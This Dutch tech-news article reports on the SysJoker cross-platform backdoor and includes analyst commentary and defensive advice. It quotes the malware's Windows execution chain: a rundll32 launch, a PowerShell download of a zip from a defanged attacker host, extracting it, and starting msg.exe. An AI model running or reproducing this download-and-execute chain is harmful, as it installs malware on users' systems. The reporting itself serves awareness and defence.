Nieuwe SysJoker-malware richt zich op Windows, Linux én MacOS

3 reacties

Malware is in opkomst. Het komt alleen zelden voor dat dit soort ongewenste programmatuur zich op meerdere besturingssystemen richt. Onderzoekers van Intezer hebben nu SysJoker ontdekt, malware dat zich op de drie belangrijkste besturingssystemen richt.

De onderzoekers denken dat de malware nieuw is en waarschijnlijk door een grotere organisatie is gemaakt. De malware kan zich voordoen als een systeemupdate, maar kan ook binnenkomen via een geinfecteerd npm-bestand. De uitvoerbare bestanden krijgen onder Windows en MacOS de extensie .ts, daarmee doet het zich voor als programma in de TypeScript-programmeertaal of een videostream. Wanneer het wordt gestart, zoekt het contact met een bestand dat op een Google Drive staat, in dat bestand vindt het de servers waarmee het beheer van de computer overgenomen kan worden. Tijdens de aanval worden de adressen van die servers veranderd om de detectie te bemoeilijken, 

Hoe gevaarlijk is SysJoker? We zochten contact met  de Belgische cybersecurityspecialist Xavier Mertens van Xameco, tevens incident behandelaar bij het SANS Internet Storm Center en ook doceert hij malware-analyse bij SANS.

Mertens: “SysJoker is een backdoor die onlangs is ontdekt. Dat betekent niet dat het nieuw is, het was waarschijnlijk al een aantal maanden actief. Het biedt ook niet veel nieuwe mogelijkheden, het grootste verschil is dat het geschikt is voor de drie belangrijkste besturingssystemen (Windows, Linux en MacOS). Hierdoor is het aantal potentiële slachtoffers groter. Het biedt technisch niets nieuws, het implementeert een achterdeur. Zodra een systeem is geinfecteerd, dan kan de aanvaller het beheer van het systeem overnemen en bijvoorbeeld programma’s uitvoeren, data kopiëren of andere zaken.

Ik denk niet dat SysJoke zelf erg gevaarlijk is. Het probleem is dat het een onderdeel is van het businessproces. Aanvallers infecteren computers met een achterdeur zoals SysJoke en verkopen vervolgens de toegang tot die deur op de zwarte markt. Dit is een gebruikelijke aanvalsmethode.

SysJoke werd niet eerder ontdekt, en ook vandaag wordt het door de meeste antivirussoftware niet ontdekt. Aanvallers gebruiken tegenwoordig technieken die niet door de standaardsoftware die door de meeste mensen worden gebruikt.

Mertens is even aan de gang gegaan met de malware: SysJoker haalt een bestand op van github[.]url-mini[.]com en hij zag dat er ook een aantal bestanden op het bestandssysteem werden gezet. "

Hieronder  krijg je inzicht in van de eerste stappen van de malware onder Windows:

• rundll32.exe 2708 "C:\Windows\System32\rundll32.exe" "C:\Users\user01\AppData\Local\Temp\recovery.dll",#1
• powershell.exe 2104 powershell.exe Invoke-WebRequest -Uri 'hxxps://github[.]url-mini[.]com/msg.zip' -OutFile 'C:\ProgramData\RecoverySystem\recoveryWindows.zip';Write-Output "Time taken : $((Get - Date).Subtract($start_time) ...(truncated)
• powershell.exe 1660 powershell.exe Expand-Archive -LiteralPath 'C:\ProgramData\RecoverySystem\recoveryWindows.zip' -DestinationPath 'C:\ProgramData\RecoverySystem'
• powershell.exe 2784 powershell.exe Remove-Item -Path 'C:\ProgramData\RecoverySystem\recoveryWindows.zip' -Force
• powershell.exe 548 powershell.exe start C:\ProgramData\RecoverySystem\msg.exe

Mertens besluit met een advies: “Mensen kunnen op dezelfde manier computers blijven gebruiken. Maar wel op hun hoede zijn en blijven. Open geen verdachte bestanden en klik niet zomaar op een link, zonder dat je zeker bent dat het een betrouwbare bron is. Installeer regelmatig updates, maar let op SysJoker kan zich voordoen als een systeemupdate."

Meer details vind je hier

 

Bronnen: Arstechnica, Intezer

« Vorig bericht Volgend bericht »
0

Hardware Info maakt gebruik van cookies

Hardware Info plaatst functionele en analytische cookies voor het functioneren van de website en het verbeteren van de website-ervaring. Deze cookies zijn noodzakelijk. Om op Hardware Info relevantere advertenties te tonen en om ingesloten content van derden te tonen (bijvoorbeeld video's), vragen we je toestemming. Via ingesloten content kunnen derde partijen diensten leveren en verbeteren, bezoekersstatistieken bijhouden, gepersonaliseerde content tonen, gerichte advertenties tonen en gebruikersprofielen opbouwen. Hiervoor worden apparaatgegevens, IP-adres, geolocatie en surfgedrag vastgelegd.

Meer informatie vind je in ons cookiebeleid.

Toestemming beheren

Hieronder kun je per doeleinde of partij toestemming geven of intrekken. Meer informatie vind je in ons cookiebeleid.

Functioneel en analytisch

Deze cookies zijn noodzakelijk voor het functioneren van de website en het verbeteren van de website-ervaring. Klik op het informatie-icoon voor meer informatie.

janee

    Relevantere advertenties

    Dit beperkt het aantal keer dat dezelfde advertentie getoond wordt (frequency capping) en maakt het mogelijk om binnen Hardware Info contextuele advertenties te tonen op basis van pagina's die je hebt bezocht.

    janee

    Hardware Info genereert een willekeurige unieke code als identifier. Deze data wordt niet gedeeld met adverteerders of andere derde partijen en je kunt niet buiten Hardware Info gevolgd worden. Deze data wordt maximaal 2 weken bewaard. Je kunt deze toestemming te allen tijde intrekken.

    Ingesloten content van derden

    Deze cookies kunnen door derde partijen geplaatst worden via ingesloten content. Klik op het informatie-icoon voor meer informatie over de verwerkingsdoeleinden.

    janee